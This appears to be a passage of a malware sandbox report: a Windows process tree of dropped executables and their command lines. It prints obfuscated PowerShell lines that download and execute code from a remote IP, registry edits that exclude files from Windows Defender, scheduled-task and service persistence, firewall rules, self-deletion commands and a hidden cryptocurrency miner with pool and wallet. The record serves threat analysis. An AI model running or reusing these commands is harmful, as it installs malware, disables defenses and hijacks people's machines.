C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:836

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3244

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
PID:3080

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:1452

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
PID:544

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 544 -s 696
3⤵
- Program crash
PID:3540

C:\Users\Admin\AppData\Local\Temp\cleanpro22.exe
"C:\Users\Admin\AppData\Local\Temp\cleanpro22.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3308

C:\Users\Admin\Documents\wLYHTFtICyo8bm8QPXKGD31r.exe
"C:\Users\Admin\Documents\wLYHTFtICyo8bm8QPXKGD31r.exe"
3⤵
PID:5184

C:\Users\Admin\Documents\tz2Kr7qnCxwwBUfX8j7vMgIp.exe
"C:\Users\Admin\Documents\tz2Kr7qnCxwwBUfX8j7vMgIp.exe"
3⤵
PID:3712

C:\Users\Admin\Documents\JCakZLFdCkx7dx_HCFrjdk0D.exe
"C:\Users\Admin\Documents\JCakZLFdCkx7dx_HCFrjdk0D.exe"
3⤵
PID:2988

C:\Users\Admin\AppData\Local\Temp\c13dcb2c-66f9-4e2f-8871-2f4afd3426a0.exe
"C:\Users\Admin\AppData\Local\Temp\c13dcb2c-66f9-4e2f-8871-2f4afd3426a0.exe"
4⤵
PID:6984

C:\Users\Admin\Documents\apnqXD0FzauqY9gabSSzHQUq.exe
"C:\Users\Admin\Documents\apnqXD0FzauqY9gabSSzHQUq.exe"
3⤵
PID:5260

C:\Users\Admin\Documents\PWZLPBbBATmlOWOF9jC6Oe_2.exe
"C:\Users\Admin\Documents\PWZLPBbBATmlOWOF9jC6Oe_2.exe"
4⤵
PID:3168

C:\Users\Admin\Pictures\Adobe Films\biY7lbSku8Zw_uPwh1XiD27Q.exe
"C:\Users\Admin\Pictures\Adobe Films\biY7lbSku8Zw_uPwh1XiD27Q.exe"
5⤵
PID:6556

C:\Users\Admin\Pictures\Adobe Films\fxnmUAa_KEE8ZVZAENJLlGvI.exe
"C:\Users\Admin\Pictures\Adobe Films\fxnmUAa_KEE8ZVZAENJLlGvI.exe"
5⤵
PID:2100

C:\Users\Admin\Pictures\Adobe Films\M_Sdz5jodx_tCL6nIUhjaJWT.exe
"C:\Users\Admin\Pictures\Adobe Films\M_Sdz5jodx_tCL6nIUhjaJWT.exe"
5⤵
PID:5616

C:\Users\Admin\Pictures\Adobe Films\dLWLrmhMHr5hqdtu_d2aPG_n.exe
"C:\Users\Admin\Pictures\Adobe Films\dLWLrmhMHr5hqdtu_d2aPG_n.exe"
5⤵
PID:7236

C:\Users\Admin\Pictures\Adobe Films\oImRimBHMCEW9NT1s9P6mJ4N.exe
"C:\Users\Admin\Pictures\Adobe Films\oImRimBHMCEW9NT1s9P6mJ4N.exe"
5⤵
PID:7472

C:\Users\Admin\Pictures\Adobe Films\0JlzmSI_VkSoZrCskXEalLdg.exe
"C:\Users\Admin\Pictures\Adobe Films\0JlzmSI_VkSoZrCskXEalLdg.exe"
5⤵
PID:7012

C:\Users\Admin\Pictures\Adobe Films\BsZyF0rF5gH4vQ78c0O_2tL4.exe
"C:\Users\Admin\Pictures\Adobe Films\BsZyF0rF5gH4vQ78c0O_2tL4.exe"
5⤵
PID:6632

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
6⤵
PID:7180

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
6⤵
PID:6384

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2412

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5348

C:\Users\Admin\Documents\_vYikojgMoevbK541srekQvW.exe
"C:\Users\Admin\Documents\_vYikojgMoevbK541srekQvW.exe"
3⤵
PID:2800

C:\Users\Admin\Documents\zfkq9DjEAEFT5GuXT2gJIDhb.exe
"C:\Users\Admin\Documents\zfkq9DjEAEFT5GuXT2gJIDhb.exe"
3⤵
PID:3708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:6400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4180

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
5⤵
PID:8148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:3536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5808

C:\Users\Admin\Documents\JZ0RqIt_F1HLU8jNKSQlqgK9.exe
"C:\Users\Admin\Documents\JZ0RqIt_F1HLU8jNKSQlqgK9.exe"
3⤵
PID:60

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:7692

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:2332

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:3408

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:7908

C:\Users\Admin\Documents\O3dlXdvLv5McqnIsVzDbjSFc.exe
"C:\Users\Admin\Documents\O3dlXdvLv5McqnIsVzDbjSFc.exe"
3⤵
PID:2372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im O3dlXdvLv5McqnIsVzDbjSFc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\O3dlXdvLv5McqnIsVzDbjSFc.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:7780

C:\Windows\SysWOW64\taskkill.exe
taskkill /im O3dlXdvLv5McqnIsVzDbjSFc.exe /f
5⤵
- Kills process with taskkill
PID:6280

C:\Users\Admin\Documents\i269wJdFc3nGq7yKwi5FO8_o.exe
"C:\Users\Admin\Documents\i269wJdFc3nGq7yKwi5FO8_o.exe"
3⤵
PID:3628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 468
4⤵
- Program crash
PID:5248

C:\Users\Admin\Documents\qnFcDKfS5_99qAWam9GLdwJ5.exe
"C:\Users\Admin\Documents\qnFcDKfS5_99qAWam9GLdwJ5.exe"
3⤵
PID:4608

C:\Users\Admin\Documents\0ufAtfCiiOFpEIyBSqPNDzzY.exe
"C:\Users\Admin\Documents\0ufAtfCiiOFpEIyBSqPNDzzY.exe"
3⤵
PID:2220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 884
4⤵
- Program crash
PID:6504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 1004
4⤵
- Program crash
PID:6376

C:\Users\Admin\Documents\Aaz4jTf9lMuU1oSSBgDQFOnu.exe
"C:\Users\Admin\Documents\Aaz4jTf9lMuU1oSSBgDQFOnu.exe"
3⤵
PID:5232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:6568

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:6284

C:\Users\Admin\Documents\oOVdNrVciU1xPZUWDO1sAGTi.exe
"C:\Users\Admin\Documents\oOVdNrVciU1xPZUWDO1sAGTi.exe"
3⤵
PID:6344

C:\Users\Admin\Documents\mAaEQwTpKe7uZNibG3Prq3t3.exe
"C:\Users\Admin\Documents\mAaEQwTpKe7uZNibG3Prq3t3.exe"
3⤵
PID:6492

C:\Users\Admin\Documents\bne4JTm92uW9CCETDx_ZJnyI.exe
"C:\Users\Admin\Documents\bne4JTm92uW9CCETDx_ZJnyI.exe"
3⤵
PID:6956

C:\Users\Admin\AppData\Local\Temp\7zS3B6B.tmp\Install.exe
.\Install.exe
4⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\7zS9A83.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:6040

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:7404

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:7124

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:7880

C:\Users\Admin\Documents\d_QfVgpnVVMnP7iWo6bBRXX6.exe
"C:\Users\Admin\Documents\d_QfVgpnVVMnP7iWo6bBRXX6.exe"
3⤵
PID:6860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\obxzwabi.exe" C:\Windows\SysWOW64\jnjrknf\
4⤵
PID:7036

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config jnjrknf binPath= "C:\Windows\SysWOW64\jnjrknf\obxzwabi.exe /d\"C:\Users\Admin\Documents\d_QfVgpnVVMnP7iWo6bBRXX6.exe\""
4⤵
PID:5592

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start jnjrknf
4⤵
PID:5320

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:5572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1216
4⤵
- Program crash
PID:7620

C:\Users\Admin\Documents\cQuKgBJhBfYZw2l1MMVp3_cf.exe
"C:\Users\Admin\Documents\cQuKgBJhBfYZw2l1MMVp3_cf.exe"
3⤵
PID:6900

C:\Users\Admin\Documents\49Y2e4J33BFeicB5lUR1YLJl.exe
"C:\Users\Admin\Documents\49Y2e4J33BFeicB5lUR1YLJl.exe"
3⤵
PID:6876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 848
4⤵
- Program crash
PID:6964

C:\Users\Admin\Documents\Ant5MQNPbc2RHENvxvbwsvCZ.exe
"C:\Users\Admin\Documents\Ant5MQNPbc2RHENvxvbwsvCZ.exe"
3⤵
PID:6672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:6872

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"
2⤵
PID:1824

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 504
4⤵
- Program crash
PID:4520

C:\Users\Admin\AppData\Local\Temp\Litever01.exe
"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"
2⤵
PID:4312

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
3⤵
PID:4824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
PID:6524

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:6612

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
4⤵
PID:5268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
5⤵
PID:1824

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
6⤵
- Creates scheduled task(s)
PID:7672

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
5⤵
PID:6728

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.admin/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BOVf8GOEpqsYJf392VKwN2gwsZ1d06Df9J2hBJw9kUq" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
5⤵
PID:7868

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7868 -s 296
6⤵
- Program crash
PID:7416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1500
3⤵
- Program crash
PID:4100

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
PID:1580

C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe
"C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe"
2⤵
PID:60

C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe
C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe
3⤵
PID:1348

C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe
C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe
3⤵
PID:1964

C:\Users\Admin\AppData\Local\Temp\Complete.exe
"C:\Users\Admin\AppData\Local\Temp\Complete.exe"
2⤵
PID:2352

C:\Users\Admin\Documents\wdFn5yA3MP8lseN57lFkhicp.exe
"C:\Users\Admin\Documents\wdFn5yA3MP8lseN57lFkhicp.exe"
3⤵
PID:2624

C:\Users\Admin\Documents\GVP5VUJt6pJLOq_Jem8heRfq.exe
"C:\Users\Admin\Documents\GVP5VUJt6pJLOq_Jem8heRfq.exe"
3⤵
PID:2332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:6044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4576

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
5⤵
PID:8140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:1040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:6252

C:\Users\Admin\Documents\W9J8tISwslUg7VSPbReVqIi_.exe
"C:\Users\Admin\Documents\W9J8tISwslUg7VSPbReVqIi_.exe"
3⤵
PID:5140

C:\Users\Admin\Documents\NG5aBR6cbaBeBVSX_wWEy1Yr.exe
"C:\Users\Admin\Documents\NG5aBR6cbaBeBVSX_wWEy1Yr.exe"
3⤵
PID:5364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 460
4⤵
- Program crash
PID:5192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 468
4⤵
- Program crash
PID:6364

C:\Users\Admin\Documents\2ci9dnra6hY5qzt73rVbFnpe.exe
"C:\Users\Admin\Documents\2ci9dnra6hY5qzt73rVbFnpe.exe"
3⤵
PID:5376

C:\Users\Admin\Documents\5uZ01eR7MpWL3Be3F3oXwGsN.exe
"C:\Users\Admin\Documents\5uZ01eR7MpWL3Be3F3oXwGsN.exe"
3⤵
PID:5564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 624
4⤵
- Program crash
PID:6628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 624
4⤵
- Program crash
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 832
4⤵
- Program crash
PID:7608

C:\Users\Admin\Documents\TE9k8vxzRTy9mRWDIx4ubAIO.exe
"C:\Users\Admin\Documents\TE9k8vxzRTy9mRWDIx4ubAIO.exe"
3⤵
PID:5616

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:6716

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:5596

C:\Users\Admin\Documents\x0Rlh6mzb9gR9zy92ICt9Cy2.exe
"C:\Users\Admin\Documents\x0Rlh6mzb9gR9zy92ICt9Cy2.exe"
3⤵
PID:5740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jnjrknf\
4⤵
PID:6604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vuojjxkr.exe" C:\Windows\SysWOW64\jnjrknf\
4⤵
PID:6200

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create jnjrknf binPath= "C:\Windows\SysWOW64\jnjrknf\vuojjxkr.exe /d\"C:\Users\Admin\Documents\x0Rlh6mzb9gR9zy92ICt9Cy2.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:5924

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description jnjrknf "wifi internet conection"
4⤵
PID:5360

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start jnjrknf
4⤵
PID:5640

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:5432

C:\Users\Admin\lrzhmujy.exe
"C:\Users\Admin\lrzhmujy.exe" /d"C:\Users\Admin\Documents\x0Rlh6mzb9gR9zy92ICt9Cy2.exe"
4⤵
PID:6084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wwdiohqn.exe" C:\Windows\SysWOW64\jnjrknf\
5⤵
PID:5756

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config jnjrknf binPath= "C:\Windows\SysWOW64\jnjrknf\wwdiohqn.exe /d\"C:\Users\Admin\lrzhmujy.exe\""
5⤵
PID:7324

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start jnjrknf
5⤵
PID:7512

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:7496

C:\Users\Admin\Documents\NQv6_lQB95pyGnGG_GkrZhyP.exe
"C:\Users\Admin\Documents\NQv6_lQB95pyGnGG_GkrZhyP.exe"
3⤵
PID:5752

C:\Users\Admin\AppData\Local\Temp\c0533412-d797-4360-8d14-bf8829f21cb0.exe
"C:\Users\Admin\AppData\Local\Temp\c0533412-d797-4360-8d14-bf8829f21cb0.exe"
4⤵
PID:6720

C:\Users\Admin\Documents\kOU74Ot0z3aJ1p2kuw4TuRon.exe
"C:\Users\Admin\Documents\kOU74Ot0z3aJ1p2kuw4TuRon.exe"
3⤵
PID:5556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 468
4⤵
- Program crash
PID:4276

C:\Users\Admin\Documents\gvpmgI7kabvL34hJeXCKRV6e.exe
"C:\Users\Admin\Documents\gvpmgI7kabvL34hJeXCKRV6e.exe"
3⤵
PID:5868

C:\Users\Admin\Documents\ushXsUkpYgvEnkg03pNJoIkf.exe
"C:\Users\Admin\Documents\ushXsUkpYgvEnkg03pNJoIkf.exe"
3⤵
PID:5860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:6700

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
5⤵
PID:7084

C:\Users\Admin\Documents\2QzZYctc1LNQzsSFY5cM1VC2.exe
"C:\Users\Admin\Documents\2QzZYctc1LNQzsSFY5cM1VC2.exe"
3⤵
PID:5464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 2QzZYctc1LNQzsSFY5cM1VC2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\2QzZYctc1LNQzsSFY5cM1VC2.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:7816

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 2QzZYctc1LNQzsSFY5cM1VC2.exe /f
5⤵
